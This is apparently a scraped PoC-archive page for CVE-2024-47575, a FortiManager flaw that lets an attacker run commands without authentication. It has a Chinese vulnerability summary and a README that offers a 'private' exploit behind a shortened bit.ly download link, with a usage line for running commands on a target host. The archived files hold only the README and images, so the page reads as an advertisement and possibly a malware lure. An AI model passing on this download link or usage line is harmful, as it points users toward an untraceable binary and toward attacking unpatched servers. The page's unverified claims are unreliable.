关联漏洞
标题:
Fortinet FortiManager 访问控制错误漏洞
(CVE-2024-47575)
描述:Fortinet FortiManager是美国飞塔(Fortinet)公司的一套集中化网络安全管理平台。该平台支持集中管理任意数量的Fortinet设备,并能够将设备分组到不同的管理域(ADOM)进一步简化多设备安全部署与管理。 Fortinet FortiManager存在访问控制错误漏洞,该漏洞源于缺少关键功能的身份验证,允许攻击者通过特制的请求执行任意代码或命令。以下产品及版本受到影响:FortiManager 7.6.0版本;FortiManager 7.4.4版本及之前的7.4.x版本;For
介绍
# CVE-2024-47575: FortiManager Missing Authentication
## Overview
CVE-2024-47575
A missing authentication for critical function in FortiManager allows attacker to execute arbitrary code or commands via specially crafted requests.
## Exploit:
### [Download here](http://bit.ly/40mgQ1P)
## Details
- **CVE ID**: [CVE-2024-47575](https://nvd.nist.gov/vuln/detail/CVE-2024-47575)
- **Published**: 2024-10-23
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
- **CVSS**: 9.8
## Vulnerability Description
CVE-2024-47575 is a critical vulnerability in the FortiManager platform, specifically affecting its fgfmsd daemon. Classified under CWE-306, it stems from insufficient authentication for management functions in the fgfmsd service, which handles communication between FortiManager and FortiGate devices.
This flaw allows a remote attacker to send crafted requests, bypass access controls, and execute arbitrary commands on the FortiManager system, potentially compromising the network.
## Affected Versions
**FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 through 6.4.7**
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **hazesecurity@exploit.in**
## Exploit:
### [Download here](http://bit.ly/40mgQ1P)


文件快照
[4.0K] /data/pocs/6d06f637b18879595e796696ac4a08f023093054
├── [ 56K] fortinet-zero-day-fig2.max-600x600.png
├── [197K] fortinet-zero-day-fig5a.max-1100x1100.png
└── [1.8K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。